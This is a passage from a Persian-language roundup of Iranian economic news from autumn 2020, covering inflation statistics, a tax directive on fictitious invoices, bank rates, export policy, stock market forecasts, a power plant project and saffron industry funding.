هم‌چنین نرخ تورم سالیانه برای خانوارهای شهری و روستایی به ترتیب ۲۶.۱درصد و ٢۵.۴ درصد است که برای خانوارهای شهری ۰.۲واحد درصد افزایش و برای خانوارهای روستایی بدون تغییر بوده است.

افزایش نرخ تورم نقطه‌ای خانوارهای کشور

منظور از نرخ تورم نقطه‌ای، درصد تغییر عدد شاخص قیمت، نسبت به ماه مشابه سال قبل است. نرخ تورم نقطه‌ای در شهریور ماه ١٣٩٩ به عدد ۳۴.۴ درصد رسیده است؛ یعنی خانوارهای کشور به طور میانگین ٣۴.۴ درصد بیشتر از شهریور ١٣٩٨ برای خرید یک «مجموعه کالاها و خدمات یکسان» هزینه کرده­‌اند.

نرخ تورم نقطه‌ای شهریور ماه ١٣٩٩ در مقایسه با ماه قبل چهار واحد درصد افزایش یافته است. نرخ تورم نقطه‌ای گروه عمده «خوراکی‌ها، آشامیدنی ها و دخانیات» با افزایش ۵,۵ واحد درصدی به ٣١.۵ درصد و گروه «کالاهای غیر خوراکی و خدمات» با افزایش ٣.٣ واحد درصدی به ٣۵.٩ درصد رسیده است.

این در حالی است که نرخ تورم نقطه‌ای برای خانوارهای شهری ۳۴.۵درصد است که نسبت به ماه قبل ۳.۹ واحد درصد افزایش داشته است. هم‌چنین این نرخ برای خانوارهای روستایی ۳۴.۱ درصد بوده که نسبت به ماه قبل ۴.۵ واحد درصد افزایش داشته است.

افزایش نرخ تورم ماهانه خانوارهای کشور

منظور از نرخ تورم ماهانه، درصد تغییر عدد شاخص قیمت، نسبت به ماه قبل است. نرخ تورم ماهانه شهریور ١٣٩٩ به ۳.۶ درصد رسیده که در مقایسه با همین اطلاع در ماه قبل، ٠.١ واحد درصد افزایش داشته است. تورم ماهانه برای گروه‌های عمده «خوراکی‌ها، آشامیدنی‌ها و دخانیات» و «کالاهای غیر خوراکی و خدمات» به ترتیب ٣.٠ درصد و ٣.٩ درصد بوده است.

این در حالی است که نرخ تورم ماهانه برای خانوارهای شهری ٣,۶ درصد می‌باشد که نسبت به ماه قبل، ٠.١ واحد درصد افزایش داشته است. هم‌چنین این نرخ برای خانوارهای روستایی ٣.۵ درصد بوده که نسبت به ماه قبل ٠.٣ واحد درصد افزایش داشته است.

تغییرات قیمت‌ها در ماه جاری

در گروه عمده «خوراکی‌ها، آشامیدنی‌ها و دخانیات» بیشترین افزایش قیمت نسبت به ماه قبل مربوط به گروه «شیر، پنیر و تخم­مرغ» (تخم مرغ، خامه، شیر پاستوریزه و پنیر پاستوریزه)، گروه «ماهی‌ها و صدف داران» (ماهی قزل آلا و کنسرو ماهی تن)، گروه «چای، قهوه و سایر نوشیدنی‌ها» (انواع نوشابه و آبمیوه) می‌باشد. در گروه عمده «کالاهای غیر خوراکی و خدمات»، گروه «حمل و نقل» (قیمت انواع خودرو)، گروه «تفریح و فرهنگ» (لوازم تحریر، قطعات کامپیوتر، دوچرخه بچه­گانه، لپ­تاپ) و گروه «مبلمان و لوازم خانگی» (لوازم پلاستیکی آشپزخانه، ماشین لباسشویی، یخچال فریزر و ظروف شیشه‌ای آشپزخانه) بیشترین افزایش قیمت را نسبت به ماه قبل داشته‌اند.

درصد تغییرات شاخص قیمت در دهک‌های هزینه‌ای کل کشور در شهریور

دامنه تغییرات نرخ تورم سالانه در شهریور ماه ١٣٩٩ برای دهک‌های مختلف هزینه‌ای از ۲۳.۴ درصد برای دهک اول تا ٢٩.٩ درصد برای دهک دهم است.

 

 

۱۱: دستورالعمل رسیدگی به صورتحساب‌های غیر واقعی ابلاغ شد

رییس سازمان امور مالیاتی دستورالعمل رسیدگی به صورتحساب‌های غیرواقعی را ابلاغ کرد.

پارسا طی بخشنامه‌ای اعلام کرد: پیرو بخشنامه قبلی در خصوص نحوه رسیدگی به صورت حساب های غیر واقعی و همچنین ضمن تاکید بر اجرای مفاد این بخشنامه در حسابرسی های مالیاتی کلیه سنوات علی الخصوص سال های ۱۳۹۷ و ۱۳۹۸ ادارات امور مالیاتی باید با دعوت از مودی مورد حسابرسی از وی درخواست کنند که اسامی خریداران و فروشندگان واقعی را که اسامی آنها در اسناد و مدارک تسلیمی اعلام نشده، ارائه کند.

در این راستا، همکاری لازم با مودی مورد حسابرسی صورت می گیرد و مهلت کافی (حداکثر یک ماه) برای ارائه اسامی خریداران و فروشندگان واقعی مد نظر قرار می گیرد و با رعایت مفاد بخشنامه، باید بدین شرح اقدام شود:

هرگاه براساس مدارک و مستندات ارائه شده توسط مودیان واقعی (خریدار و فروشنده) یا مودیان فاقد اعتبار مالیاتی (مودیان صوری بعنوان خریدار یا فروشنده) یا اطلاعات واصله از سایر اشخاص مشخص شود مودی واقعی نسبت به خرید از مودیان فاقد اعتبار مالیاتی(مودیان صوری) یا فروش به آنها اقدام کرده است،ادارات امور مالیاتی مکلفند نسبت به عدم پذیرش اعتبار مالیاتی خرید (خرید از مودیان فاقد اعتبار مالیاتی) اقدام کنند.

مگر اینکه مودی نسبت به معرفی فروشنده واقعی اقدام نماید و در صورت مطالبه و پس از وصول مالیات و عوارض ارزش افزوده خرید مذکور از فروشنده واقعی، مبالغ پرداختی برای خریدار واقعی اعتبار مالیات بر ارزش افزوده محسوب می شود.

همچنین باید در مواردی که قبلا نسبت به پذیرش اعتبار خرید از مودیان فاقد اعتبار اقدام کرده اند، مجددا نسبت به مطالبه مالیات تا سقف اعتبار غیر واقعی پذیرفته شده از خریدار واقعی (با توجه به عدم پرداخت مالیات و عوارض در زمان خرید) اقدام کنند.

طبق اعلام سازمان امور مالیاتی، با توجه به عدم صدور صورتحساب با نام خریدار واقعی، نسبت به مطالبه جریمه عدم صدور صورتحساب موضوع مواد ۱۶۹ مکرر قانون مالیات های مستقیم و همچنین بند ۲ ماده ۲۲ قانون مالیات بر ارزش افزوده اقدام کنند.

نسبت به مطالبه جریمه عدم ارسال فهرست معاملات خرید یا فروش نیز موضوع مواد ۱۶۹ مکرر قانون مالیات های مستقیم قانون مالیات های مستقیم حسب مورد نسبت به معاملات با مودیان صوری اقدام کنند.

با توجه به موافقت وزیر امور اقتصادی و دارایی با تفویض بخشودگی جرایم مودیان موضوع این بخشنامه به سازمان امور مالیاتی کشور در اجرای بند (۳) مصوبات چهل و هشتمین جلسه شورای عالی هماهنگی اقتصادی، جرایم مقرر در قوانین مالیات های مستقیم و مالیات بر ارزش افزوده برای عملکرد سال ها و دوره های مالیاتی ۱۳۹۵ و به بعد این گونه مودیان که نسبت به معرفی خریداران یا فروشندگان واقعی اقدام نکنند، مشمول بخشودگی جرایم نخواهند بود.

همچنین در صورت همکاری صرفا به نسبت درصد اعلام اسامی خریداران و فروشندگان واقعی از اشخاص فاقد اعتبار مالیاتی (مودیان صوری) و در اجرای مفاد ماده ۱۹۱ قانون مالیات های مستقمی با رعایت مفاد دستورالعمل مذکور مشمول بخشودگی جرایم قوانین مالیات های مستقیم و مالیات بر ارزش افزوده و به نسبت درصدهای اعلام شده در دستوالعمل فوق الذکر خواهند بود.

در خصوص جرایم سال های قبل از ۱۳۹۵ نیز بخشودگی جرایم در اجرای ماده ۱۹۱ قانون مالیات های مستقم تا سقف درصدهای تعیین شده و با رعایت مفاد دستورالعمل مذکور به مدیر کل امور مالیاتی تفویض می شود.

درصورت عدم معرفی خریدار و فروشنده واقعی (تمام یا بخشی) توسط اینگونه مودیان برای معاملات سال های ۱۳۹۵ و به بعد، ادارات کل امور مالیاتی مکلفند نسبت به معاملات غیر واقعی در اجرای مقررات مواد ۲۳۰ و ۲۷۴ قانون مالیات حسب مورد در اجرای شیوه نامه شماره ۲۰۰/۹۷/۵۷ مورخ ۱۳۹۷/۰۴/۱۶ اقدام کنند.

در صورت شناسایی یا معرفی فروشنده یا خریدار واقعی، ادارات امور مالیاتی با رعایت مقررات نسبت به مطالبه مالیات از مودی واقعی اقدام کنند.

مسئولیت اجرای دقیق این بخشنامه و بخشنامه قبلی با مدیران کل امور مالیاتی است و ادارات کل امور مالیاتی مکلفند اقدامات انجام شده در بخشنامه های فوق را به صورت ماهانه در سامانه ای که برای این منظور توسط معاونت فناوری های مالیاتی ایجاد می شود، وارد کنند.

معاونت فناوری های مالیاتی نیز موظف است با استفاده از داده ها و اطلاعات پایگاه های اطلاعاتی سازمان، نسبت به شناسایی سیستمی مودیانی که معامله (خرید یا فروش) آنها با اشخاص فاقد اعتبار مالیاتی (مودیان صوری) می باشد، اقدام و فهرست آن را جهت بهره برداری ادارات امور مالیاتی در سامانه قرار دهد.

دادستانی انتظامی مالیاتی و دفتر مبارزه با فرار مالیاتی و پولشویی مکلفند ضمن نظارت بر حسن اجرای مفاد بخشنامه های فوق، نحوه اجرای آن را به معاونت حقوقی و فنی مالیاتی سازمان گزارش کنند.

 

۱۲: افزایش نرخ سود سپرده های بانکی ناجی نقدینگی است

یک تحلیلگر اقتصادی ضمن بررسی دلایل رشد نقدینگی و پایه پولی، گفت: مردم با افزایش چمشگیر بازدهی بازار سرمایه و کاهش نرخ سود سپرده‌های بانکی نسبت به سال‌های گذشته، دیگر تمایلی به نگهداری ریال ندارند و آن را در بازارهای سرمایه، خودرو، مسکن و… به دارایی تبدیل می‌کنند؛ بنابراین در این شرایط بهتر است نرخ سود سپرده‌های بانکی افزایش قابل ملاحظه‌ای پیدا کند تا ناجی نقدینگی باشد.

کامران ندری، درباره دلایل رشد نقدینگی، اظهار کرد: در حال حاضر دلیل عمده رشد نقدینگی، کسری بودجه و تکالیف مستقیم یا غیرمستقیمی است که دولت یا مجلس برای بانک‌ها تعیین می‌کنند. علاوه براین، افزایش ذخایر خارجی بانک مرکزی برای تامین کسری بودجه از منابع صندوق توسعه ملی نیز موجب افزایش پایه پولی شده است.

وی افزایش تنخواه دولت را بر افزایش رشد پایه پولی موثر دانست و گفت: از ابتدای سال تکالیفی برای بانک‌ها چون اعطای تسهیلات کرونایی، خرید اوراق دولتی، پرداخت ودیعه مسکن محول شده و الزام بانک‌ها به کاهش نرخ سود سپرده قانونی، عواملی است که بر رشد نقدینگی به خصوص افزایش ضریب فزاینده پول تاثیرگذار بوده‌اند.

تاثیر افزایش بازدهی بورس بر ارزش ریال

به گفته این‌ تحلیلگر اقتصادی، افزایش بازدهی بازار سرمایه موجب شده انگیزه مردم برای نگهداری ریال کاهش پیدا کند که این امر، به معنای کاهش ارزش پول ملی است.

در ادامه این کارشناس اقتصادی افزود: اگر تورم منشأ داخلی نداشته باشد، تحریم‌ها می‌توانند تورم را ایجاد کنند اما به مرور زمان از بین می‌رود؛ بنابراین، تحریم‌ها تنها عامل افزایش تورم نیستند و سیاست‌های داخلی چون رشد بالای نقدینگی و عدم تمایل مردم به نگهداری پول ملی هم بر این امر تاثیرگذار هستند.

وی با اینکه مضرات نقدینگی با کنترل رشد آن رفع می‌شود، تاکید کرد: انگیزه‌ای برای مردم ایجاد نشده که پول ملی یا ریال را نگهداری کنند بلکه سیاست‌هایی اتخاذ شده تا مردم را به عدم نگهداری از ریال ترغیب کند. نقدینگی در سال‌های ۱۳۹۲ تا ۱۳۹۶ هم رشد بالایی داشت اما دلیل کاهش تورم در آن زمان، انگیزه بالای مردم برای نگهداری ریال بود و آن‌ها تمایلی برای خرید مسکن، خودرو و …‌ نداشتند. زیرا، در آن سال‌ها نرخ  سود بانکی افزایش قابل توجهی پیدا کرده بود و مردم به سپرده‌گذاری در بانک‌ها ترغیب می‌کرد.

سود سپرده‌های بانکی باید افزایش یابد

ندری خاطرنشان کرد که در وضعیت فعلی نرخ سود بانکی باید افزایش پیدا کند، زیرا نرخ بازدهی دارایی‌های چون بازار سهام افزایش یافته به‌گونه‌ای مردم تمایلی به نگهداری ریال ندارند و سهام خریداری می‌کنند.

این تحلیلگر اقتصادی در پایان تصریح کرد: نرخ بازدهی در بازار سهام به میزانی افزایش یافته و ثروت زیادی در آن شکل گرفته است که اگر بخشی از این ثروت به سمت سایر بازارهای دیگر سرریز شود، آن بازارها با افزایش شدید قیمت مواجه خواهند شد.

 

 

۱۳: سهم ۳۱ درصدی بخش صنعت و معدن از تسهیلات پرداختی بانک‌ها

معاونت طرح و برنامه وزارت صنعت، معدن و تجارت، سهم حوزه صنعت و معدن از تسهیلات پرداختی بانک‌ها و موسسات اعتباری به بخش‌های مختلف در چهار ماهه نخست سال ۹۹ را حدود ۳۱ درصد اعلام کرد.

به گزارش وزارت صنعت، تا پایان تیرماه از مجموع سه هزار و ۶۶۴ میلیارد ریال تسهیلات پرداختی بانک‌ها و موسسات اعتباری به بخش‌های مختلف اقتصادی کشور، حدود یک‌هزار و ۱۶۴ میلیارد ریال تسهیلات به بخش صنعت و معدن اختصاص یافته است.

در این گزارش، میزان تسهیلات اعطایی بانک‌ها و موسسات اعتباری به بخش بازرگانی ۷۴۱ میلیارد ریال اعلام شده که حدود ۲۰ درصد از مجموع تسهیلات پرداختی است.

در این زمینه، معاونت طرح و برنامه وزارت صنعت، تعداد واحدهای صنعتی مشمول تامین مالی پروژه‌های اقتصاد مقاومتی را یک‌هزار و ۷۱۵ واحد اعلام کرد که در قالب تسهیلات برنامه تولید و اشتغال (تبصره ۱۸) و در قالب پروژه رونق تولید در پنج ماهه نخست سال ۹۹ تسهیلات دریافت کرده‌اند.

در این مدت، بیش از ۲۷ هزارو ۴۰۰ میلیارد ریال تسهیلات برنامه تولید و اشتغال (تبصره ۱۸ قانون بودجه) به ۴۶۳ واحد پرداخت شده و همچنین در قالب پروژه رونق تولید نیز ۲۷ هزار و ۷۰۰ میلیارد ریال و در مجموع حدود ۵۵ هزار ۱۰۰ میلیارد ریال به یک‌هزار و ۲۵۲ واحد تسهیلات ارائه شده است.

بر اساس این گزارش و در قالب تسهیلات برنامه تولید و اشتغال (تبصره ۱۸)، از ابتدای اسفند ماه ۹۷ تا پایان مرداد ۹۹، در مجموع ۵۹ هزار و ۹۷۴ میلیارد ریال تسهیلات به یک‌هزار و ۴۰ واحد پرداخت شده است.

 

۱۴: صادرات ریالی؛ خروج سرمایه یا راهی برای عبور از دوره گذار؟

رییس اتاق بازرگانی ایران و چین اظهار داشت: صادارات ریالی هیچ مزایایی برای کشور ندارد. در صورتی که ارز خارجی به چرخه رسمی تجاری باز نگردد، صرف خروج سرمایه و کالای قاچاق می‌شود.

در سال‌های گذشته صادارت ریالی بویژه برای کشورهای عراق و افغانستان به عنوان روشی برای تجارت استفاده می‌شود. اما در شرایط کنونی و نیاز ارزی کشور این موضوع مورد پذیرش مقامات پولی نیست بطوریکه معاون ارزی بانک مرکزی گفته بود: «ارز حاصل از صادرات باید به چرخه اقتصادی کشور بازگردد و پشتوانه تجارت خارجی کشور باشد. صادرات ریالی به معنای خروج سرمایه کشور است و لذا بانک مرکزی آن را به رسمیت نمی‌شناسد».

مجیدرضا حریری، رئیس اتاق بازرگانی ایران و چین، در این مورد به ایلنا گفت: صادرات ریالی وجود ندارد، زیرا باید در مقابل آن ارز یا کالا وارد کشور شود. صادراتی که ما کالایی را به فروش برسانیم و ریال دریافت کنیم، معنایی ندارد.

حریری ادامه داد: چنین صاداراتی نمی‌تواند سودی برای کشور داشته باشد و هیچ مزایایی ندارد. در صورتی که ارز خارجی به چرخه رسمی تجاری کشور باز نگردد، صرف خروج سرمایه و کالای قاچاق می‌شود. درواقع اگر کالایی که صادر می‌شود در مقابل آن ارزی به چرخه اقتصادی کشور وارد نشود به این معناست که ارز به چرخه غیر رسمی ورود پیدا می‌کند.

وی تصریح کرد: صادراتی که ارزآوری ندارد؛ بهتر که انجام نگیرد. چراکه صادرات می‌کنیم که ارز آوری داشته باشیم، اگر چنین نباشد چه سودی برای مملکت دارد.

حسین سلیمی، رییس اتاق بازرگانی ایران و افغانستان، در رابطه صادرات ریالی به ایلنا گفت: مبادلاتی که با کشور افغانستان داریم، سالهاست به صورت ریالی انجام می‌گیرد و صادرات ما از این طریق انجام می‌شود. چون بیشتر افغانی‌هایی که در ایران اشتغال دارند، می‌خواهند از ریال خود استفاده کنند.

وی ادامه داد: البته موضوعی که اینجا وجود دارد؛ انتقال ارز و تعهد ارزی آن است. براساس قانون صادرکنندگان باید تعهد ارزی داشته باشند و بین ۵۰ تا ۷۰ درصد ارز حاصل بازگردانده شود. اگرچه این تعهد وجود دارد، اما در این مورد قرار است که بانک مرکزی راه حلی در نظر بگیرد. از همن روی تا هفته آینده بانک مرکزی باید راه حلی را برای این موضوع در نظر بگیرد، تا مشکلی در این زمینه وجود نداشته باشد.

سلیمی ادامه داد: یکی از مزایای این صادرات آن است که هم روان است و هم افغانی‌ها به خرید با ریال عادت دارند، به همین جهت حفظ این ارتباط حائز اهمیت است. زیرا در زمان بهبود وضعیت بانکی بسیاری از افغانی‌ها می‌توانند ارز پرداخت کنند. اما اکنون خروج  ارز از افغانستان با سختی انجام می‌شود و قانون پول‌شویی مطرح می‌شود. ضمن آنکه صرافی واسط نیز وجود ندارد. این مشکل اساسی است که به مسائل بانکی مرتبط است و در صورتی که این موضوع حل شود عملا دلار به صورت قانونی وارد می‌شود.

وی ادامه داد: با توجه به مشکلات عدیده‌ای که صادرکنندگان با آن دست و پنجه نرم می‌کنند، بهتر است فعلا صادرات به همین شکل انجام شود تا پس از لغو تحریم‌ها و ثبات اقتصادی قوانین مربوط به صادرات ارزی عملی شود چون در آن صورت صرافی‌ها و بانک‌ها می‌توانند نقل و انتقالات ارز داشته باشند. اما موضوع سختگیرانه باشد، صادرات به کشورهای همسایه نیز متوقف می‌شود.

سلیمی خاطرنشان کرد: فعلا باید کشورهای همسایه را که صادرات ریالی با آنها وجود داشت، مستثنی کرد تا شرایط به حالت عادی برگردد و بتوان از طریق صرافی‌ و بانک‌ها نقل و انتقالات ارزی را انجام داد. البته بسیاری ارز وارد می‌کنند اما کسی که می‌خواهد یک میلیون دلار خرید کند، نمی‌تواند ۱۰ بار رفت و آمد برای پرداخت داشته باشد.

 

۱۵: پیش‌بینی اوضاع بورس در ماه‌های آینده

یک تحلیلگر اقتصادی ضمن پیش بینی اوضاع بورس در کوتاه و میان مدت، گفت: بازار سرمایه باعث افزایش نقدینگی نمی‌شود بلکه سرمایه اسمی و سرعت گردش پول را افزایش می‌دهد. همچنین، تا زمانی که نقدینگی در بورس جذب شود، تورم‌ ایجاد نمی شود و رشد بورس تورم‌زا نیست.

علی سعدوندی در یک برنامه اینستاگرامی به سوالات مخاطبان درباره وضعیت فعلی و آینده بازارهای اقتصادی کشور، پاسخ داد و گفت: اگر وضعیت تورم به همین صورت باقی بماند، بازار سرمایه حباب دارد، اما در حال حاضر این حباب زیاد نیست. در صورتی که تورم بازارهای موازی از بورس بیشتر باشد طبیعی است که افراد پول خود را از بورس خارج کنند و از آنجا که حباب شکل گرفته در بازار مسکن بی سابقه است، ممکن است فردی سرمایه خود را از بورس وارد مسکن کند.

وی افزود: در شرایطی که ارز، طلا، مسکن و…گران است، وضعیت بورس نسبت به بازارهای موازی مناسب‌تر است. هر چه به سمت آخر سال و ابتدای سال بعد حرکت کنیم، شاخص بورس به یک تعادل می‌رسد که افراد دارای سهام‌های بنیاددار، ضرر نخواهند کرد و کسانی که در مرداد ماه وارد بورس شده‌اند، احتمالا متتفع خواهند شد.

بورس در میان مدت صعود می‌کند

این کارشناس اقتصادی بازار سرمایه در روزهای اینگونه را پیش‌بینی ‌کرد که روند شاخص در کوتاه مدت نزولی و در میان مدت صعودی باشد و کسانی که سهام‌های بی‌ارزش و براساس شایعات خریده‌اند، ضرر خواهند کرد اما این ضرر نباید باعث شود که بازار را ترک کنند بلکه باید از آن درس بگیرند و از این به بعد با مشورت بیشتر عمل کنند.

سعدوندی ادامه داد: اگر خودرو در بورس عرضه شود، نتایج مثبتی چون افزایش قیمت بورس کالا، بهبود وضعیت شرکت‌های خودروسازی و اخذ مالیات دارد که در کل این اقدام می‌تواند شرکت‌های قطعه سازی، فولادی، پتروشمیی و بانک‌ها را منتفع کند.

۲ میلیونی شدن شاخص بورس یکسال زمان می‌برد 

به اعتقاد این تحلیلگر اقتصادی، یکسال َزمان می‌برد تا شاخص بورس به دو میلیون و ۱۰۰ هزار واحد برسد. وضعیت کنونی اقتصاد خیلی بهتر می‌شود اگر نقدینگی به سمت بازار اوراق برود و دولت دست به انتشار اوراق بزند و نرخ سود آن را به بالای ۲۵ تا ۲۶ درصد برساند.

سعدوندی یکی از ملزومات بهبود شرایط اقتصادی کشور را عملیات بازار باز بانکی دانست و گفت: یکی از اصلاحات برای اقتصاد کشور این است که بین بودجه ارزی و ریالی تفکیک صورت گیرد و درآمدهای حاصل از نفت وارد بودجه نشود. علاوه براین، تسهیل در روند کسب‌وکارها و اعطای مجوز  راه حل اقتصادی است اما متاسفانه جهش تولید در سطح یک شعار باقی مانده است. اگر تولید را سودآور کنید، حتما نقدینگی به سمت آن حرکت می‌کند.

بورس نقدینگی را افزایش نمی‌دهد 

این کارشناس اقتصادی اظهار کرد: بازار سرمایه باعث افزایش نقدینگی نمی‌شود اما باعث افزیش سرمایه اسمی می‌شود و می‌تواند سرعت گردش پول را افزایش بدهد و تا زمانی که نقدینگی در بورس جذب شود تورم زا نیست. همچنین، رشد بورس تورم‌زا نیست بلکه سقوط بورس تورم‌زاست.

وی مشکل اساسی اقتصاد کشور را روش تامین کسری بودجه دانست و ادامه داد: اگر ارز ۴۲۰۰ تومانی حذف می‌شد اکنون قیمت دلار ۱۴ تا ۱۵ هزار تومان بود. همچنین اگر محدودیت‌های صادرلاتی لغو شود با ریزش قیمت دلار مواجه خواهیم بود.

 

۱۶: ساخت نیروگاه برق جدید با مشارکت روسیه در جنوب کشور

وزیر نیرو گفت: پیمانکار جدید نیروگاه یک هزار و ۴۰۰ مگاواتی سیریک در استان هرمزگان از سوی روسیه انتخاب شده که مورد تایید است و انتظار می‌رود عملیات اجرایی این نیروگاه از هفته‌های آتی آغاز شود.

رضا اردکانیان افزود: بالاخره طرف روس به این نتیجه رسید که می‌بایست پیمانکار را تغییر دهند براین اساس پیمانکار جدیدی انتخاب شد که این پیمانکار جدید مورد تاییدکشورمان هم است.

وی ادامه داد: اکنون مراحل مختلف اداری تشریفات مربوط به این نقل و انتقال در حال انجام است.

وزیر نیرو گفت: امیداست که در هفته‌های پیش رو بتوان شاهد شروع ورود منابع مالی مربوط به پروژه سیریک از ناحیه پیمانکارجدید  و شروع فعالیت اجرایی این نیروگاه باشیم.

به گزارش ایرنا، آذرماه  ۱۳۹۷ بود که وزیر نیرو گفت: عملیات اجرایی طرح بزرگ یک هزار و ۴۰۰ مگاواتی نیروگاه سیریک واقع در شرق استان هرمزگان انجام می‌شود.

رضا اردکانیان آن هنگام در حاشیه بهره برداری از مرحله نخست طرح نوسازی خط آبرسانی میناب به بندرعباس اظهار داشت: نیروگاه سیریک با خط اعتباری فدراسیون روسیه با اعتبار یک هزار و ۲۰۰ میلیون دلار ساخته می‌شود.

۲۴شهریور پارسال وزیر نیرو از تمدید وام دولتی روسیه برای احداث نیروگاه یک هزار و ۴۰۰ مگاواتی در منطقه سیریک هرمزگان خبر داد.

وی همان زمان  در دیدار «سرگئی استورچاک» معاون وزیر دارایی فدراسیون روسیه که در تهران برگزار شد، گفت: قرارداد استفاده از وام یک میلیارد و ۲۰۰ میلیون یورویی دولت روسیه برای احداث نیروگاه یک میلیارد و ۴۰۰ میلیون یورویی سیریک هرمزگان به دلیل طولانی شدن تشریفات عملیاتی نیازمند یک الحاقیه برای تمدید مدت قرارداد بود که این الحاقیه بین وزارت دارایی روسیه و وزارت امور اقتصادی و دارایی ایران امضا شد.

شهرستان سیریک در سواحل دریای عمان و خلیج فارس واقع است.
هرمزگان هم اکنون دارای سه نیروگاه تولید برق است که با بهره برداری از نیروگاه سیکل ترکیبی بندرعباس و نیروگاه سیریک تعداد آنها به پنج واحد افزایش می یابد.

 

۱۷: تمدید مجوزها و پروانه‌های فعالیت در بخش حمل‌ونقل کشور تا پایان سال

معاون حمل‌ونقل وزارت راه و شهرسازی از تمدید پروانه فعالیت شرکت‌های حوزه حمل‌ونقل تا پایان سال خبر داد.

شهرام آدم نژاد، جانشین وزیر راه و شهرسازی در ستاد مدیریت بحران عنوان کرد: با توجه به استمرار همه‌گیری بیماری کرونا و ضرورت و تأکید بر ادامه رعایت پروتکل‌های بهداشتی ابلاغی ستاد ملی مدیریت بیماری کرونا به ویژه به منظور حفظ فاصله‌گذاری اجتماعی، کاهش مراجعات مردم و عدم ایجاد ازدحام در مراکز ارائه‌کننده خدمات، پروانه فعالیت شرکت‌های حوزه حمل‌ونقل و کارگزار و دیگر مجوزهای تحت مسؤولیت سازمان‌ها و شرکت‌های تابعه وزارت راه و شهرسازی تا پایان اسفند سال ۹۹ تمدید شد.

وی خاطرنشان کرد: البته همکاران ما در تلاش هستند تا با توسعه بستر ارائه خدمات الکترونیک، درآینده نزدیک مراجعات حضوری اجباری به دستگاه‌های مرتبط برای انجام امور اداری را به حداقل ممکن برسانند تا به‌رغم تهدیدهایی که شیوع ویروس کرونا ایجاد کرده، از این شرایط به عنوان یک فرصت برای تسهیل خدمات‌دهی به مردم و افزایش شفافیت با بهره‌گیری از تکنولوژی استفاده شود.

گفتنی است که تمدید مجوزهای فعالیت حوزه حمل‌ونقل پیش‌تر طی دو مرحله تا پایان خرداد و پایان شهریور انجام شده بود.

 

۱۸: آغاز پذیره نویسی بورس املاک و مستغلات از مهرماه

پذیره نویسی بورس املاک و مستغلات از مهرماه و انتخاب نماینده ویژه از اعضای شورای عالی بورس، برای پیگیری موضوع بازگشایی نماد کنتورسازی، مصوبات امروز جلسه شورای عالی بورس بود.

به گزارش بازار سرمایه، حسن قالیباف اصل گفت: شورای عالی بورس امروز آخرین وضعیت راه اندازی بورس املاک و مستغلات و امتیازات را بررسی کرد. در این زمینه مقرر شد تا هیات موسس، اساسنامه را تنظیم و به سازمان بورس و اوراق بهادار ارسال کند تا در صورت تایید نهایی، پذیره نویسی این بورس از مهرماه آغاز شود.

رییس سازمان بورس و اوراق بهادار بررسی موضوع بازگشایی نماد کنتورسازی را دومین مصوبه امروز شورای عالی بورس بیان کرد و ابراز داشت: آخرین وضعیت این شرکت نیز به شورا گزارش و مقرر شد تا انجام اقدامات لازم برای بازگشایی نماد این شرکت از سوی سازمان امور مالیاتی، بانک مرکزی و سازمان تامین اجتماعی سرعت گیرد.

دبیر شورای عالی بورس افزود: در همین راستا، یکی از اعضای شواری عالی بورس به عنوان نماینده ویژه انتخاب شد تا در کنار سازمان بورس و اوراق بهادار، پیگیر  این موضوع باشد تا هرچه سریعتر، نماد این شرکت در بورس بازگشایی شود.

پذیره نویسی بورس املاک و مستغلات از مهرماه و انتخاب نماینده ویژه از اعضای شورای عالی بورس، برای پیگیری موضوع بازگشایی نماد کنتورسازی، مصوبات امروز جلسه شورای عالی بورس بود.

به گزارش بازار سرمایه، حسن قالیباف اصل گفت: شورای عالی بورس امروز آخرین وضعیت راه اندازی بورس املاک و مستغلات و امتیازات را بررسی کرد. در این زمینه مقرر شد تا هیات موسس، اساسنامه را تنظیم و به سازمان بورس و اوراق بهادار ارسال کند تا در صورت تایید نهایی، پذیره نویسی این بورس از مهرماه آغاز شود.

رییس سازمان بورس و اوراق بهادار بررسی موضوع بازگشایی نماد کنتورسازی را دومین مصوبه امروز شورای عالی بورس بیان کرد و ابراز داشت: آخرین وضعیت این شرکت نیز به شورا گزارش و مقرر شد تا انجام اقدامات لازم برای بازگشایی نماد این شرکت از سوی سازمان امور مالیاتی، بانک مرکزی و سازمان تامین اجتماعی سرعت گیرد.

دبیر شورای عالی بورس افزود: در همین راستا، یکی از اعضای شواری عالی بورس به عنوان نماینده ویژه انتخاب شد تا در کنار سازمان بورس و اوراق بهادار، پیگیر  این موضوع باشد تا هرچه سریعتر، نماد این شرکت در بورس بازگشایی شود.

 

۱۹: آمادگی صندوق نوآوری برای کمک به تکمیل و توسعه خطوط صنایع فراوری زعفران 

رئیس صندوق نوآوری و شکوفایی گفت: تسهیلات لازم به شرکت‌های دانش بنیان فعال در حوزه زعفران برای تکمیل و توسعه خطوط تولید این محصول ارائه خواهد شد.

دکتر علی وحدت رییس صندوق نوآوری و شکوفایی در دیدار دکتر محسن زنگنه نماینده مردم تربت حیدریه و عضو کمیسیون برنامه و بودجه مجلس شورای اسلامی بر لزوم همکاری مجلس با صندوق نوآوری و شکوفایی برای تخصیص بودجه صندوق تاکید کرد و افزود: صندوق نوآوری آمادگی دارد تسهیلات لازم را به شرکت‌های دانش بنیان فعال در حوزه زعفران برای تکمیل و توسعه خطوط تولید این محصول ارائه کند. همچنین در مورد زنجیره تامین زعفران می‌توانیم تکمیل زنجیره را در قالب طرح‌های ملی کشور مورد حمایت قرار دهیم.

رییس صندوق نوآوری و شکوفایی ادامه داد: برای آشنایی شرکت‌های دانش بنیان تربت حیدریه با خدمات و تسهیلات صندوق نوآوری نیز جلسه‌ای با گروه کارشناس صندوق برگزار خواهد شد.

در این دیدار نیز دکتر محسن زنگنه، بر تخصیص بودجه صندوق نوآوری و شکوفایی از بودجه عمومی کشور تاکید کرد و گفت: برای پرداخت نیم درصد از بودجه عمومی کشور به صندوق نوآوری و شکوفایی آمادگی داریم و در این زمینه همکاری خواهیم کرد.

وی پس از آشنایی با عملکرد ۲۰ ماهه اخیر صندوق نوآوری و شکوفایی در خدمات‌رسانی به اکوسیستم نوآوری کشور گفت: با توجه به خدماتی که به شرکت‌های دانش بنیان ارائه شده است، سهم مشارکت و سرمایه‌گذاری صندوق نوآوری بیشتر از مشارکت بانک‌ها بوده است.

به نقل از روابط عمومی صندوق نوآوری و شکوفایی، زنگنه به محصول زعفران ایران اشاره کرد و گفت: ایران ۹۵ درصد از زعفران دنیا را تامین می‌کند، لذا تکمیل و توسعه خطوط تولید این محصول و جلوگیری از خام فروشی آن ضروری است.

 

 

۲۰: آینده درخشان استارتاپ‌ها با استفاده از صندوق‌های سرمایه‌گذاری

